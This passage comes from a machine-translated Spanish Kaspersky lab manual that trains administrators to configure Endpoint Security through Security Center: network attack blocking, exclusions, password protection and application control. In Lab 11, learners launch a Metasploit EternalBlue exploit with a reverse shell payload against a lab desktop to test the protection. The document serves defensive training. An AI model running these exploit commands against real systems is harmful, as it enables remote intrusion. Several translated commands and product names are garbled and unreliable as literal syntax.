61) Asegúrese de que el invoice.txt.aes el archivo ha aparecido en el escritorio, pero el factura.txt el archivo no ha sido eliminado

62. Cambie a la Seguridad-


Centrar computadora

63. Abra Kaspersky


Consola web del centro de
seguridad

64. Cambie a la
Monitoreo e informes |
Selecciones de eventos lengüeta

65. Marque el Intrusión de host


eventos de prevención

selección

66. Haga clic en comienzo para mostrar

la selección del evento

67. Estudie los eventos en el


selección. Asegúrese de que
fue Host Intrusion Prevention
lo que no permitió que el
programa eliminara el
documento

Conclusión

Ha configurado Host Intrusion Prevention para permitir que solo los programas de confianza editen documentos de texto. Para protegerse adecuadamente contra el ransomware,
agregue más tipos de documentos a la categoría: * .doc, * .docx, * .xlsx, etc.

Los programas de proveedores conocidos, como Microsoft Office, son confiables y Host Intrusion Prevention no los restringirá. El ransomware, incluso nuevo que aún
no se ha agregado a la base de datos de firmas o KSN, nunca entrará en la categoría de confianza y no podrá editar documentos.
L – 67
Laboratorio 11.

Cómo probar la Protección contra amenazas de red

Laboratorio 11.

Cómo probar la Protección contra amenazas de red

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Escanea su red periódicamente
con un escáner de seguridad especial para averiguar si las computadoras están protegidas adecuadamente. Kaspersky Endpoint Security bloquea los ataques en las
computadoras escaneadas y luego bloquea cualquier conexión desde la computadora atacante durante una hora. Agregue la computadora desde la que realiza el análisis de
vulnerabilidades a la lista de exclusiones.

Contenido. En este laboratorio, haremos lo siguiente:

1) Imite un ataque de red de Kali en Alex-Desktop


2) Estudie el informe de ataque de red
3) Desbloquee la computadora Kali
4) Configure la Protección contra amenazas de red para que no bloquee Kali
5) Imite un ataque de Kali en Alex-Desktop y estudie los resultados.

Tarea A: Imite un ataque de red de Kali en Alex-Desktop

En la computadora Kali, ejecute la utilidad de penetración Metasploit Framework. Realiza un ataque Eternalblue.

EternalBlue explota una vulnerabilidad en el protocolo Server Message Block (SMB) v1. Un criminal puede generar un paquete especialmente preparado, transferirlo a una
computadora remota, obtener acceso remoto al sistema y ejecutar cualquier código allí.

La tarea se realiza en Kali


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1) Inicie sesión en el raíz cuenta. Contraseña- Ka5per5Ky

2) Ejecute la terminal

3) Iniciar el Metasploit Framework consola. Ejecute el siguiente comando:

msfconsole

4) Selecciona la plantilla de exploit. Ejecute el siguiente comando:

use exploit / windows / smb / ms17_010_eternalblue

5) Especifique la carga maliciosa. Llevar a cabo

establecer la carga genérica / shell_reverse_tcp

6) Especifique la dirección del servidor de escucha (dirección del Kali computadora). Ejecute el siguiente comando:

establecer LHOST 10.28.0.50


L – 68 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

7) Especifique la dirección de la máquina víctima. Ejecute el siguiente comando:

establecer RHOST 10.28.0.100

8) Activa el exploit. Llevar a cabo

explotar

Tenga en cuenta que no puede explotar la vulnerabilidad

El ataque falla porque Kaspersky Endpoint Security bloquea los ataques de red de forma predeterminada.

Tarea B: Estudie el informe de ataque de red

Encuentre la lista de informes en la Consola de administración. Cree una nueva plantilla para el Informe de ataque a la red. Genere el informe, consulte los detalles del
ataque a la red, encuentre las direcciones de las máquinas atacantes y atacadas.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

9. Abra Kaspersky
Consola web del centro de
seguridad

10. Cambie a la
Monitoreo e informes |
Informes
lengüeta

11. Haga clic en Añadir

12. Nombra el informe


Informe de ataque a la red

13. Bajo Estadísticas de


amenazas, Seleccione Informar

sobre ataques a la red

14. Haga clic en próximo


L – 69
Laboratorio 11.

Cómo probar la Protección contra amenazas de red

15. Haga clic en próximo

16. Seleccione para incluir

información de los últimos 30


días

17. Haga clic en Okay

18. En el cuadro de mensaje,

hacer clic Guardar y correr

19. Cambie a la Detalles


lengüeta
L-70 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

20. Encuentre la dirección IP de

la computadora atacante y el
nombre DNS de la máquina
atacada en el informe

21. Cerrar el informe

22. Cambie a la Evento


Trozos escogidos lengüeta

23. Click Añadir para crear un


nueva selección de eventos

24. Nombra la selección


Ataques de red

25. Cambie a la Eventos


sección

26. En el Solicitud
nombre campo, seleccione

Kaspersky Endpoint
Security para Windows

27. Para el Nivel de severidad,


escoger Crítico

28. Seleccione la casilla de verificación

Incluir eventos generales


L – 71
Laboratorio 11.

Cómo probar la Protección contra amenazas de red

29. En la lista de eventos,


encontrar y seleccionar el

Ataque de red
detectado evento

30. Haga clic en Salvar para salvar el

selección de eventos

31. En el cuadro de mensaje, marque

Ir al resultado de la selección

y haga clic Salvar

32. Estudie los eventos en el


selección

Tarea C: Desbloquee la computadora Kali

Abra Kaspersky Endpoint Security en la computadora atacada. Use el menú contextual del componente Firewall para abrir Network Monitor. Encuentre la lista de
computadoras bloqueadas y desbloquee Kali computadora.
L – 72 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Centro de Seguridad, Tom-Laptop, y Kali Las máquinas deben estar encendidas.

33) Abra la interfaz de Kaspersky Endpoint Security:


Haga clic en su icono en el área de notificación.

34. Haga clic en el Componentes de protección zona

35) En la parte inferior de la ventana, haz clic en Red


Monitor

36. El Monitor de red la ventana se abrirá


L – 73
Laboratorio 11.

Cómo probar la Protección contra amenazas de red

37. Cambie a la Computadoras bloqueadas lengüeta

38. Desbloquee el Kali computadora: seleccionar dirección

10.28.0.50 y haga clic Desatascar

39. Cerrar todo Kaspersky Endpoint Security


ventanas

Tarea D: Configurar exclusiones en las propiedades de Protección contra amenazas de red

En la política de Kaspersky Endpoint Security, abra la configuración de Network Attack Blocker. Encuentre la lista de computadoras confiables y agregue la dirección IP del Kali computadora
(10.28.0.50) a ella.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Kali Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

40. Abra Kaspersky


Consola web del centro de
seguridad

41. Ir a Dispositivos | Políticas


Y perfiles

42. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

43. Cambie a la
Configuraciones de la aplicación

lengüeta

44. Abra el Esencial


Protección contra amenazas

sección

45. Haga clic en el enlace Red


Protección contra amenazas

46. ​Abra la lista de confianza


computadoras: haga clic en el

enlace Exclusiones
L – 74 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

47. Haga clic Añadir para especificar un

dispositivo

48. Escriba la dirección IP de


el Kali computadora,
10.28.0.50, y haga clic
Okay

49. Haga clic Okay

50. Haga clic Salvar para salvar el

política

51. Espere a que la política sea


forzado

Tarea E: Imite un ataque de Kali en Alex-Desktop y estudie los resultados.

Simule otro ataque en la computadora Alex-Desktop de Kali utilizando Metasploit Framework. Asegúrese de que Kaspersky Endpoint Security ya no
reaccione a este ataque.

La tarea se realiza en Kali


los CORRIENTE CONTINUA, Centro de Seguridad, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

52) Inicie sesión en el raíz cuenta. Contraseña- Ka5per5Ky

53) Abrir una ventana de terminal

54) Activa el exploit nuevamente. Ejecute el siguiente comando:

explotar

55) Asegúrese de haber explotado la vulnerabilidad en el protocolo SMB


L – 75
Laboratorio 12.

Cómo configurar exclusiones de defensa personal

56) Mostrar la lista de directorios. Ejecute el siguiente comando:

dir

Conclusión

Ha configurado la Protección contra amenazas de red para que no reaccione a los ataques desde la dirección IP especificada. Puede usar este método para excluir direcciones de
escáneres de seguridad de red.

Además, ha creado un nuevo informe y una nueva selección de eventos. Hay muchos tipos de informes en Kaspersky Security Center. Si los informes preconfigurados
disponibles en la pestaña Informes son insuficientes, consulte la lista completa de informes que puede crear.

Si ninguno de ellos satisface tus necesidades, crea una selección de eventos que te interesen. Configurar condiciones: tipos de eventos, hora, grupo de computadoras, etc.

Laboratorio 12.

Cómo configurar exclusiones de defensa personal

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Para ayudar de forma remota a los
empleados, debe conectarse a sus máquinas mediante la Asistencia remota de Windows. Sin embargo, Kaspersky Endpoint Security no reacciona a sus acciones a través de la
Asistencia remota de Windows. Haga una exclusión para la Asistencia remota de Windows para poder administrar Kaspersky Endpoint Security de forma remota.

Contenido. En este laboratorio, haremos lo siguiente:

1) Intente interactuar con Kaspersky Endpoint Security a través de la Asistencia remota de Windows
2) Permita que la Asistencia remota de Windows interactúe con Kaspersky Endpoint Security
3) Abra el informe local de Kaspersky Endpoint Security en una sesión de Asistencia remota de Windows

Tarea A: Intente interactuar con Kaspersky Endpoint Security a través de la Asistencia remota de
Windows

Ejecute la Asistencia remota de Windows en Alex-Desktop, recuerda la identificación y contraseña. Ejecute la Asistencia remota de Windows en
Tom-Laptop y conectarse a Alex-Desktop. Abra la interfaz de Kaspersky Endpoint Security. Intenta abrir la ventana Informes.
L – 76 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Alex-Desktop primero. los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las
máquinas deben estar encendidas.

1. Ejecutar panorama

2. Presione WIN + R

3. Escriba msra en el campo

4. Haga clic en Okay

5) Seleccione la opcion Invita a alguien de confianza para que te ayude

6. Seleccione Use el correo electrónico para enviar una invitación.

7) Especifique el destinatario. En el A: caja, tipo tom@abc.lab

8. Haga clic en Enviar


L – 77
Laboratorio 12.

Cómo configurar exclusiones de defensa personal

9) Anote la contraseña de conexión remota

Cambiar a Tom-Laptop

10. Inicie sesión en abc \ Tom


cuenta. Contraseña-
Ka5per5Ky

11. Ejecutar panorama

12. En la Bandeja de entrada, abra el

Mensaje de
Alex@abc.lab

13. Haga clic en el archivo adjunto

Invitación.*

14. Haga clic en Abierto

15. Escriba la contraseña de conexión remota (consulte el paso 8)

Cambiar a la Alex-Desktop máquina.

16. Permitir Tom para conectarse a su estación de trabajo. En la ventana que se abre,
hacer clic si
L – 78 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Cambiar a Tom-Laptop

17. Haga clic en Solicitar control

en la esquina superior izquierda de


la ventana

Cambiar a la Alex-Desktop máquina.

18. Permitir Tom para administrar su estación de trabajo. En la ventana que se abre,
hacer clic si

Cambiar a Tom-Laptop

19. Abierto Kaspersky


Puesto final de Seguridad

interfaz

20. Asegúrate de que


no puede manejar
Kaspersky Endpoint Security remotamente
L – 79
Laboratorio 12.

Cómo configurar exclusiones de defensa personal

Tarea B: Permita que la Asistencia remota de Windows interactúe con Kaspersky Endpoint Security

Abra la política de Kaspersky Endpoint Security. Encuentra la lista de programas confiables. Añade el msra.exe archivo a la lista de aplicaciones de confianza. Permita que
interactúe con la interfaz de Kaspersky Endpoint Security.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

21. Abra Kaspersky


Consola web del centro de
seguridad

22. Ir a Dispositivos | Políticas


Y perfiles

23. Abrir la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

24. Cambie a la
Configuraciones de la aplicación lengüeta

25. Abra el General


Configuraciones sección

26. Abra la lista de


exclusiones: haga clic en
Exclusiones enlace

27. Para agregar un confiable

aplicación, haga clic en el enlace Aplicaciones

de confianza en la esquina inferior


izquierda de la ventana

28. Para especificar el servicio


proceso de Asistencia remota de
Microsoft, haga clic en el Añadir botón
L – 80 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

29. En el Camino caja, tipo


% systemroot% \ system32 \
msra.exe

30) Desactive las siguientes casillas de verificación:

- No escanee archivos abiertos

- No herede las restricciones del proceso primario (aplicación)

31) Permitir Asistencia remota de Windows para interactuar con la interfaz KES: seleccione la casilla de verificación No bloquee la interacción.
con la interfaz de la aplicación y haga clic Okay

32. Para guardar la lista de

aplicaciones, haga clic Okay

33. Haga clic en Salvar para salvar el

política

34. Espere a que la política sea


forzado

Tarea C: Abra el informe local de Kaspersky Endpoint Security en una sesión de Asistencia remota de
Windows

Use la Asistencia remota de Windows para conectarse desde Tom-Laptop a Alex-Desktop. Abra la ventana Informes en Kaspersky Endpoint Security.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

35. Abra Kaspersky


Informes de Endpoint

Security: haga clic en el

Informes botón

36. Cerrar todo Kaspersky


Ventanas de Endpoint
Security

37. Cierre todas las ventanas

Ventanas de asistencia
remota

Conclusión

Ha permitido que una aplicación de acceso remoto interactúe con la interfaz de Kaspersky Endpoint Security.
L – 81
Laboratorio 13.

Cómo configurar la protección con contraseña

Laboratorio 13.

Cómo configurar la protección con contraseña

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Para evitar que los
usuarios deshabiliten la protección, prohíba administrar Kaspersky Endpoint Security and Network Agent sin una contraseña.

Contenido. En este laboratorio, haremos lo siguiente:

1) Encuentre una computadora donde la protección esté desactivada

2) Establecer una contraseña para la administración local de Kaspersky Endpoint Security


3) Establecer una contraseña para la desinstalación del Agente de red

Tarea A: Encuentre una computadora donde la protección esté desactivada

En Tom-Laptop, salga de Kaspersky Endpoint Security.

Encuentre el mensaje que informa que la protección está deshabilitada en algunas computadoras en el Supervisión página. Vaya a la selección de computadoras donde la protección está
desactivada. Abra las propiedades de la computadora, busque la aplicación Kaspersky Endpoint Security e iníciela.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1) Inicie sesión en el abc \ Tom cuenta. Contraseña- Ka5per5Ky

2) Salga de Kaspersky Endpoint Security utilizando el menú contextual de su icono.

Cambiar a la Centro de Seguridad computadora.

3. Inicie sesión en
abc \ Administrador
cuenta con la contraseña Ka5per5Ky

4. Abrir Kaspersky
Centro de Seguridad Consola
web

5. Cambie a la
Monitoreo e informes |
Tablero
lengüeta

6. Tenga en cuenta que uno de los

dispositivos tiene el Crítico


estatus de Protección

7. Haga clic en el Crítico enlace

para consultar la lista de


dispositivos que tienen este
estado
L – 82 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

8. Asegúrese de que
la protección no se está ejecutando Tom-Laptop

9. Abra el dispositivo
propiedades: haga clic en el

enlace Tom-Laptop

10. Cambie a la
Aplicaciones lengüeta

11. Seleccione Kaspersky

Puesto final de Seguridad y haga clic comienzo

12. Cierre la computadora


propiedades y volver a Monitoreo
e informes | Tablero

13. Tenga en cuenta que la protección

el estado ha cambiado de
Crítico a Okay

Tarea B: Proteja Kaspersky Endpoint Security con una contraseña

En la política de Kaspersky Endpoint Security para estaciones de trabajo, encuentre protección con contraseña entre la configuración de la interfaz. Habilite la protección con contraseña
y aplíquela a operaciones críticas con Kaspersky Endpoint Security.

En la computadora Tom-Laptop, intente salir de Kaspersky Endpoint Security. Asegúrese de que no puede salir de la aplicación sin la contraseña. Intente desinstalar Kaspersky
Endpoint Security a través del Panel de control de Windows. Asegúrese de que esta operación también esté protegida con contraseña.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

14. Abra Kaspersky


Consola web del centro de
seguridad

15. Ir a Dispositivos | Políticas


Y perfiles

16. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)
L – 83
Laboratorio 13.

Cómo configurar la protección con contraseña

17. Cambie a la
Configuraciones de la aplicación

lengüeta

18. abierto Configuración general

El | Interfaz

19. Haga clic en el Contraseña

protección DESACTIVADA
conmutador

20. Ingrese la contraseña


Ka5per5Ky

21. Haga clic en Okay

22. Haga clic en Añadir para especificar un

usuario
L – 84 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

23. Haz clic en el enlace Seleccione

usuario

24. En el cuadro de búsqueda, escriba

alex

25. Elige el Alex


cuenta

26. Haga clic en Seleccione

27. Marque lo siguiente


operaciones:

- Configurar
ajustes de la
aplicación

- Eliminar / modificar /
restaurar la aplicación

- Deshabilitar la política de

Kaspersky Security Center

- Salir de la
aplicación

28. Haga clic en Okay


L – 85
Laboratorio 13.

Cómo configurar la protección con contraseña

29. Asegúrese de que el Alex


el usuario ha sido agregado a la
lista

30. Haga clic en Okay para salvar el

cambios

31. Guarde la política: haga clic en

Salvar y si

32. Espere a que la política sea


aplicado

Tarea C: Asegúrese de que Kaspersky Endpoint Security esté protegido con contraseña

Asegúrese de que necesita ingresar credenciales para realizar algunas acciones dentro del programa.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

33. Inicie sesión en el abc \ Tom cuenta. Contraseña- Ka5per5Ky

34) Intente salir de KES utilizando el menú contextual de su icono en la barra de tareas
L – 86 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

35. En el Confirmacion de contraseña ventana, ingrese el abc \ Alex cuenta y


contraseña Ka5per5Ky

36) Asegúrese de que la aplicación se haya cerrado correctamente

37. abierto Programas y características

38. Seleccionar Kaspersky Endpoint Security para


Ventanas

39. Asegúrese de que el Desinstalar el botón no es


disponible

Tarea D: Establecer una contraseña para la desinstalación del Agente de red

Abra la política del Agente de red y encuentre la configuración de protección con contraseña allí. Habilite la protección con contraseña, escriba una contraseña y realice estos ajustes
necesarios; es decir, prohibir a los usuarios modificarlos.

Sobre el Tom-Laptop computadora, intente desinstalar el Agente de red. No ingrese la contraseña y asegúrese de que no puede desinstalar Network Agent sin
ella.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

40. Abra Kaspersky


Consola web del centro de
seguridad

41. Ir a Dispositivos | Políticas


Y perfiles

42. Abra la política de


Agente de red de Kaspersky
Security Center
L – 87
Laboratorio 13.

Cómo configurar la protección con contraseña

43. Cambie a la
Configuraciones de la aplicación

lengüeta

44. Habilitar contraseña


protección en el
Configuraciones sección: Seleccionar

para Use la contraseña de

desinstalación

45. Ingrese la contraseña


Ka5per5Ky

46. ​Hacer cumplir Utilizar

desinstalar contraseña
configuración (edición de bloqueo) y

haga clic en Salvar

47. Espere a que la política sea


aplicado

Cambiar a Tom-Laptop

48. abierto Programas y características

49. Seleccionar Agente de red de seguridad de Kaspersky

50. Haga clic Desinstalar para tratar de eliminarlo

51) En la ventana de información de Windows, confirme


que desea desinstalar la aplicación

52) En la página de bienvenida del asistente de desinstalación,

hacer clic próximo


L – 88 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

53. Haga clic próximo sin ingresar una contraseña

54) Asegúrese de que el Agente de red no pueda ser


desinstalado sin la contraseña

55. Haga clic en Okay para cerrar el mensaje de error

56. Haga clic Cancelar para salir del mago

57) Confirme que desea salir: haga clic en si

58. Haga clic en Terminar para cerrar el mago

Conclusión

Ha habilitado la protección con contraseña para Kaspersky Endpoint Security and Network Agent. Ahora los usuarios no pueden desinstalar las aplicaciones de Kaspersky Lab,
salir de Kaspersky Endpoint Security o detener la protección.

Tampoco pueden detener el servicio o el proceso de Kaspersky Endpoint Security. La defensa personal de Kaspersky Endpoint Security evita esto.

Para ocultar el hecho de que Kaspersky Endpoint Security está instalado en la computadora de los usuarios, seleccione no mostrar el icono de KES en el área de notificación. Esta
configuración se encuentra en la sección Interfaz de la política de Kaspersky Endpoint Security.

Laboratorio 14.

Cómo configurar el control de aplicaciones

Guión. Usted es administrador en ABC Inc., cuya red está protegida con Kaspersky Endpoint Security. Se gestiona a través del Centro de seguridad de
Kaspersky.

De acuerdo con la política de seguridad corporativa, Internet Explorer es el único navegador web permitido. Todas las actualizaciones de seguridad disponibles se descargan regularmente,
mientras que las actualizaciones de otros navegadores no. Teniendo en cuenta el hecho de que el malware generalmente penetra en una red a través de los navegadores de hoy, se tomó la
decisión de prohibir todos los demás navegadores.

Su tarea es hacer cumplir los requisitos de la política de seguridad. Debe bloquear todos los navegadores, excepto Internet Explorer con el Control de aplicaciones.

Contenido. En este laboratorio, haremos lo siguiente:

1) Cree una categoría para todos los navegadores web excepto Internet Explorer
2) Prohibir a los usuarios iniciar cualquier navegador web excepto Internet Explorer
3) Inicie Mozilla Firefox e Internet Explorer
L – 89
Laboratorio 14.

Cómo configurar el control de aplicaciones

Tarea A: Cree una categoría para todos los navegadores web excepto Internet Explorer

Cree una categoría de aplicación que incluya todos los navegadores, excepto Internet Explorer 11.0 o posterior. Para agregar todos los navegadores, use las categorías de Kaspersky
Lab (KL). Para excluir Internet Explorer, use los metadatos de iexplore.exe expediente.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra Kaspersky
Consola web del centro de
seguridad

2. Abra el Operaciones
lengüeta. Sobre el Aplicaciones de
terceros menú desplegable, haga clic
en

Categorías de aplicación

3. Para crear un nuevo

categoría, haga clic Añadir

4. Especificar Navegadores para

el nombre de la categoría

5. Para la categoría
método de creación, seleccione

Categoría con contenido agregado

manualmente

6. Haga clic en próximo

7. Para especificar un nuevo

condición para la categoría,

haga clic en Añadir

8. Seleccione De KL
categoría

9. Haga clic en próximo


L – 90 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

10. Seleccione la categoría


Navegadores |

Navegadores web

11. Haga clic en próximo

12. Haga clic en próximo

13. Especificar exclusiones.


Hacer clic Añadir

14. En la lista de exclusión


condiciones, elegir
Hash, metadatos o
certificado

15. En la lista desplegable,


Seleccione Desde archivo o

desde paquete MSI

16. Haga clic en próximo

17. Haga clic en Vistazo

18. En la ventana que


abre, seleccione el
iexplore.exe archivo de
Alex-Desktop
(\\ Alex-Desktop \ c $ \ Archivos de
programa \ Internet Explorer \
iexplore.exe)

19. Haga clic en próximo


L – 91
Laboratorio 14.

Cómo configurar el control de aplicaciones

20. Cambie la condición a


Metadatos

21. En el Versión del archivo

lista desplegable, seleccione

Mayor qué o igual a

22. En el Solicitud
versión lista desplegable,
seleccione Mayor qué o igual
a

23. Click próximo

24. Haga clic en Okay

25. Para confirmar la creación de


Navegadores categoría, haga clic Okay

Tarea B: Prohibir a los usuarios iniciar cualquier navegador excepto Internet Explorer

Abra la configuración de Control de aplicaciones en la política de Kaspersky Endpoint Security del grupo Estaciones de trabajo. Habilite Control de aplicaciones y
seleccione el Bloquear modo en lugar de Notificar.

Agregar una regla que prohíba iniciar programas de Navegadores categoría que creó en la tarea anterior.
L – 92 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

26. Abra Kaspersky


Consola web del centro de
seguridad

27. Ir a Dispositivos | Políticas


Y perfiles

28. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

29. Cambie a la
Configuraciones de la aplicación

lengüeta

30. Abra el Seguridad


Control S sección

31. Seleccione el Solicitud


Controlar componente

32. Habilite el Solicitud


Controlar componente

33. Desactivar el Modo de prueba

34. Haga clic en el enlace Reglas

Configuración de listas

35. Agregar una categoría a la


lista negra Hacer clic Añadir
L – 93
Laboratorio 14.

Cómo configurar el control de aplicaciones

36. Haz clic en el enlace Categoría

no está definido

37. Seleccione el Navegadores

categoría

38. Haga clic en Okay

39. Asegúrese de que el


Navegadores la categoría está

bloqueada para todos los usuarios

40. Haga clic en Okay

41. Habilite esta categoría si


no se ha habilitado
automáticamente

42. Haga clic en Okay

43. Guarde la política: haga clic en

Salvar y si

44. Espere a que la política sea


aplicado

Tarea C: Inicie Mozilla Firefox e Internet Explorer

Asegúrese de que los usuarios puedan iniciar Internet Explorer pero no Mozilla Firefox.

Cambiar a la Alex-Desktop máquina. los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las máquinas

deben estar encendidas.

45 Inicie sesión en el abc \ Alex cuenta, contraseña Ka5per5Ky

46) Ejecutar el Mozilla Firefox navegador


L – 94 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

47) Tenga en cuenta que Kaspersky Endpoint Security bloquea

Firefox e informa al usuario al respecto

48. Haga clic Okay para cerrar el mensaje de error

49. Ejecute el explorador de Internet navegador

50 Asegúrese de que Kaspersky Endpoint Security


no bloquea explorador de Internet

Conclusión

Si necesita permitir o prohibir un grupo de programas, las categorías de Kaspersky Lab son muy útiles. Las categorías se actualizan cuando se ejecutan las actualizaciones de la base
de datos, y puede estar seguro de que las últimas versiones de los navegadores populares se agregan y aplican automáticamente.

Al configurar el Control de aplicaciones, recuerde: las reglas configuradas para denegar el acceso siempre tendrán mayor prioridad que las que permiten el acceso. Por esta
razón, si necesita prohibir una categoría de programa, excepto para algunas aplicaciones, deberá crear una regla para bloquear el acceso y agregar exclusiones para las
aplicaciones permitidas, lo cual se demostró en este laboratorio. Cualquier otra configuración no funcionará.
L – 95
Laboratorio 15.

Cómo bloquear el inicio de aplicaciones desconocidas en la red

Laboratorio 15.

Cómo bloquear el inicio de aplicaciones desconocidas en la red

Guión. Usted es administrador en ABC Inc., cuya red está protegida con Kaspersky Endpoint Security. Se gestiona a través del Centro de seguridad de Kaspersky. El control de
aplicaciones, así como la prevención de intrusiones en el host, pueden disminuir el riesgo de infectarse con nuevo malware. Configuremos el Control de aplicaciones para bloquear el
inicio de todos los archivos, excepto los de confianza dentro de directorios específicos del sistema operativo.

Contenido. En este laboratorio, haremos lo siguiente:

1) Cree una categoría de aplicación que prohíba iniciar archivos desconocidos


2) Cambie la política para prohibir a todos los usuarios iniciar archivos desconocidos
3) Asegúrese de que la configuración funcione correctamente

Tarea A: Cree una categoría de aplicación que prohíba iniciar archivos desconocidos

En esta tarea, creará una categoría de aplicación para crypto ransomware.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra Kaspersky
Consola web del centro de
seguridad

2. Abra el Operaciones
lengüeta. Sobre el Aplicaciones de
terceros menú desplegable,
seleccione
Categorías de aplicación

3. Crear una nueva categoría.


Hacer clic Añadir

4. Escriba Proteccion
Cryptomalware para el nombre de la
categoría

5. Para la categoría
método de creación, seleccione

Categoría con contenido agregado

manualmente

6. Haga clic en próximo


L – 96 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

7. Para crear una condición,


hacer clic Añadir

8. Copie el
Condiciones_Protección_Cryptomalware.txt archivo a su escritorio.
Pregúntele al entrenador dónde encontrar el archivo

9. Abre el archivo
Condiciones_Protección_Cryptomalware.txt en el Bloc de notas

10. Seleccione Especificar ruta a

aplicación (máscaras
compatibles)

11. Haga clic en próximo

12. Seleccione y copie el primero


línea del archivo
Condiciones_Protección
_Cryptomalware.txt

13. Pega la línea copiada


y haga clic próximo

14. Haga clic en Añadir para incluir

los otros valores

15. De manera similar, agregue


todos los otros caminos desde

Condiciones_Protección
_Cryptomalware.txt

16. Haga clic en próximo


L – 97
Laboratorio 15.

Cómo bloquear el inicio de aplicaciones desconocidas en la red

17. Especificar exclusiones.


Hacer clic Añadir

18. Seleccione De KL
categoría

19. Haga clic en próximo

20. Seleccionar todo Categorías KL

21. Haga clic en próximo

22. Haga clic en Okay


L – 98 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

23. Confirme la creación de


categoría. Hacer clic Okay

Tarea B: Cambie la política para prohibir a todos los usuarios iniciar archivos desconocidos

Abra la configuración de Control de aplicaciones en la política de Kaspersky Endpoint Security del grupo Estaciones de trabajo. Habilite Control de aplicaciones y
seleccione el Bloquear modo en lugar de Notificar.

Agregue una regla que prohíba iniciar programas de la categoría Protection Cryptomalware que creó en la tarea anterior.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

24. Abra Kaspersky


Consola web del centro de
seguridad

25. Ir a Dispositivos | Políticas


Y perfiles

26. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

27. Cambie a la
Configuraciones de la aplicación

lengüeta

28. Abra el Seguridad


Control S sección

29. Seleccione el Solicitud


Controlar componente
L – 99
Laboratorio 15.

Cómo bloquear el inicio de aplicaciones desconocidas en la red

30. Haga clic en el enlace. Reglas

Configuración de listas

31. Haga clic Añadir

32. Haga clic en el enlace Categoría

no está definido

33. En la lista de categorías,


Seleccione Protección
Cryptomalware

34. Haga clic Okay


L – 100 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

35. Haga clic en Okay

36. Haga clic en Okay

37. Haga clic Okay

38. Guarde la política: haga clic en

Salvar y si

39. Espere a que la política sea


aplicado

Tarea C: Asegúrese de que la configuración funcione correctamente

En esta tarea, se asegurará de que Kaspersky Endpoint Security bloquee el inicio de archivos desconocidos.

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las máquinas deben estar encendidas.

